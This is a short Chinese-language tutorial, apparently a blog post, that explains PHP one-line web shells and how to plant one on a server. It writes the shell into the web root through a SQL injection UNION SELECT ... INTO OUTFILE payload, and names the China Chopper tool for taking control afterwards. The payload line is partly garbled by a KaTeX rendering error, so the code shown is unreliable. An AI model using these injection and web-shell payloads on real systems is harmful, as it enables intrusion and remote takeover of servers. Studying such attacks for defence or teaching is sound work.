一句话木马:
一句话木马的
一句话木马的多种写法
如何通过into outfile写入恶意代码并控制OS
一句话木马概念:一句话木马是一种短小而精悍的木马客户端,利用各种语言执行各种代码的函数,或者用来执行操作系统命令的函数,通过其构造一个简单的木马程序,将函数直接写进文件中,通过对文件的访问去执行该函数,向该函数传入想要对应的操作,传进去的内容会作为远程控制的操作去执行,从而实现对客户端的控制。
通过SQL注入漏洞结合 into outfile来实现对文件的写入
前提条件:
1.需要知道远程目录访问远程目录,才可以准确写入对应文件,若是写了但是不清楚文件的路径在哪,可能也访问不到其
2.需要远程目录有写权限远程连接服务获取有写权限
3.需要数据库开启了secure_file_priv
获取系统的操作权限:
kobe’ union select “<?php @eval(KaTeX parse error: Expected 'EOF', got '#' at position 56: …www/html/1.php"#̲ kobe' 构造前端闭合,通…_GET[ ‘test’ ])?>”,2 into outfile “/var/www/html/2.php”#
system是php用来执行操作系统的函数,通过GET传参。
通过sql注入漏洞对远程命令的执行的效果,通过该接口可以远程控制其服务器,可以使用与一句话木马配套的工具比如说菜刀来简单控制服务器。